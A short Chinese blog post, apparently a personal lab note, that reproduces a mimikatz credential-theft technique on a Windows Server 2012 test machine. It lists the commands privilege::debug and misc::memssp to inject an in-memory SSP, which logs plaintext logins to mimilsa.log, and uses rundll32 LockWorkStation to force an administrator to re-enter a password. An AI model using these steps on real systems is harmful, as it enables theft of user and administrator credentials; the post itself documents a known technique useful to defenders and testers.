mimikatz-内存中的SSP

看先知上一个大佬的文章时发现了这种mimikatz抓密码的方法,赶快记录一下。脚本小子一枚,原理什么的根本没有搞懂鸭,以后等没这么菜了,再来补充吧,原文连接和复现过程在下面
原文链接

靶机为windows server 2012,在靶机上依次运行命令

mimikazt.exe
privilege::debug
misc::memssp
exit


然后等用户再次登录输入密码的时候,就会把明文账号密码记录到 C:\Windows\System32\mimilsa.log 文件,输入rundll32.exe user32.dll,LockWorkStation进入屏保等待管理员输入账号密码就会记录下来,查看文件发现密码已经成功抓到,这里因为测试多次,所以有多个密码

posted @   BuFFERer  阅读(536)  评论(0编辑  收藏  举报
编辑推荐:
· 现代计算机视觉入门之:什么是图片特征编码
· .NET 9 new features-C#13新的锁类型和语义
· Linux系统下SQL Server数据库镜像配置全流程详解
· 现代计算机视觉入门之:什么是视频
· 你所不知道的 C/C++ 宏知识
阅读排行:
· 【译】我们最喜欢的2024年的 Visual Studio 新功能
· 个人数据保全计划:从印象笔记迁移到joplin
· Vue3.5常用特性整理
· 重拾 SSH:从基础到安全加固
· 并发编程 - 线程同步(一)
点击右上角即可分享
微信分享提示